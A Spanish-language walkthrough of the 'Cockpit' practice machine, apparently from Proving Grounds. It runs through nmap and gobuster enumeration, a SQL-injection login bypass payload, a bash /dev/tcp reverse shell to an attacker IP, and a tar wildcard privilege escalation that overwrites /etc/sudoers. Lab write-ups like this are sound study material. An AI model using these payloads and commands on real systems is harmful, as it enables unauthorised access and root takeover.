> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-cockpit-gobuster-extension-php-+-blaze-cms-sqli-bypass-login-+-ubuntu-web-+-revershell-+.md).

# MAQUINA COCKPIT (Gobuster extension php + Blaze CMS 'SQLI BYPASS LOGIN' + UBUNTU WEB + REVERSHELL +

Enumere las puertos con abiertos con nmap

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FlOfd2HJ4jx2frju2VCuY%2F0.png?alt=media)

A estos puertos abiertos les ejecute una serie de script básicos de reconocimiento para ver los servicios que corren y sus versiones.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FLTjaEoeXBzOQn2ceH0cB%2F1.png?alt=media)

Use whatweb para identificar las tecnologías que corren en los servidores web (80 y 9090)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FjESiYskQcnsBI3C5F82P%2F2.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FrOWd6ZZEy109mr8RKq5N%2F3.png?alt=media)

En el servidor web del puerto 9090 encontré un panel de sesión de ubuntu, la cual requiere credenciales.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F01IXuYnODh20uqcLf5XQ%2F4.png?alt=media)

En el servidor web del puerto 80 me encontré con una web estática.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FRTh6UbIjXvJmvKLosQEC%2F5.png?alt=media)

Use unos script de nmap para identificar algo mas interesante.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Fz5HUMMV3xiD4rEvuJ96i%2F6.png?alt=media)

`nmap -p80,9090 --script='http-*' --min-rate 3000 cockpit`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F46a1wRczVVkPvwRCNTB7%2F7.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FgAC9YrOUsD9Bc308Twks%2F8.png?alt=media)

Terminado el escaneo observe que posiblemente esta corriendo en php la pagina web del puerto 80.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FOaTJNsqfHIAgWcttssgK%2F9.png?alt=media)

Use gobuster para encontrar directorios ocultos, a este escaneo le agregue extensiones php,html,txt.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F9P9MBgSsj09LvVshPRDM%2F10.png?alt=media)

Finalizado el escaneo de directorios, la herramienta encontró un directorio llamado login.php.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FHtuNZDV9MWBlwyu4mO9e%2F11.png?alt=media) ![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FHiqM0nMuRaeGW1f52rmv%2F12.png?alt=media)

Como no tengo credenciales intente realizar una sqlijection, una vez enviado me devuelve el siguiente error.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FBh1msjULZ8y0TjLGu0Ev%2F13.png?alt=media)

Luego de buscar en google alguna bypass de autenticación, utilice el siguiente:

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F0N3ZxRm9fP1XC59idpf3%2F14.png?alt=media)

'OR "='

Finalmente funciono y logre el acceso al servidor web donde encontré credenciales las cual las contraseñas se encontraban hasheadas.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2Ft5E5EZ0Uy7ZZfPBMguQP%2F15.png?alt=media)

Con esta herramienta logre identificar los hashes: <https://hashes.com/es/tools/hash_identifier>

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FJvZZoQhnR6eE1sOdnVyD%2F16.png?alt=media) ![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FXvb1D4XVqDMaeIZvtBpl%2F17.png?alt=media)

Como me indica, están encondeadas en base64 por lo que paso a decodificarlas con el parámetro "base64 -d" logrando obtener las credenciales en texto plano.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FABH3UpDbNaz4HNZVCZV0%2F18.png?alt=media)

Seguido volví al panel de sesión del servidor web que corre por el puerto 9090.. Una vez allí probé las credenciales de los 2 usuarios.

En este caso me centre en el usuario james.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FeKyFWM7rs8XNVnd9JqId%2F19.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F4HI3bbLqPUy1EPNPypc8%2F20.png?alt=media)

Ya dentro, luego de realizar un reconocimiento encorte una terminal donde puedo ejecutar comandos como el usuario james.

Aproveche esto y realice una revershell para conectarme desde esta maquina a mi maquina atacante.

`bash -i >& /dev/tcp/192.168.45.159/80 0>&1`

Busque la forma de escalar privilegios, para ellos ejecute el comando sudo -l y vi que puedo ejecutar el binario "tar".

Para explotar este binario se requiere 3 archivos:

INFO: [https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-](https://medium.com/%40polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa) [f79ab9e407fa](https://medium.com/%40polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa)

`# 1. Create files in the current directory called`

`# '--checkpoint=1' and '--checkpoint-action=exec=sh privesc.sh'`

`echo "" > '--checkpoint=1'`

`echo "" > '--checkpoint-action=exec=sh privesc.sh'`

`# 2. Create a privesc.sh bash script, that allows for privilege escalation`

`#malicous.sh:`

`echo 'kali ALL=(root) NOPASSWD: ALL' > /etc/sudoers`

`#The above injects an entry into the /etc/sudoers file that allows the 'kali'`

`#user to use sudo without a password for all commands`

`#NOTE: we could have also used a reverse shell, this would work the same!`

`#OR: Even more creative, you could've used chmod to changes the permissions #on a binary to have SUID permissions, and PE that way`

`touch ./--checkpoint=1`

`touch ./--checkpoint-action=exec=sh privesc.sh`

`chmod +x privesc.sh`

Por ultimo ejecuto el binario.

Luego de unos segundos ejecute el comandos script y observe que logre logearme como usuario root.
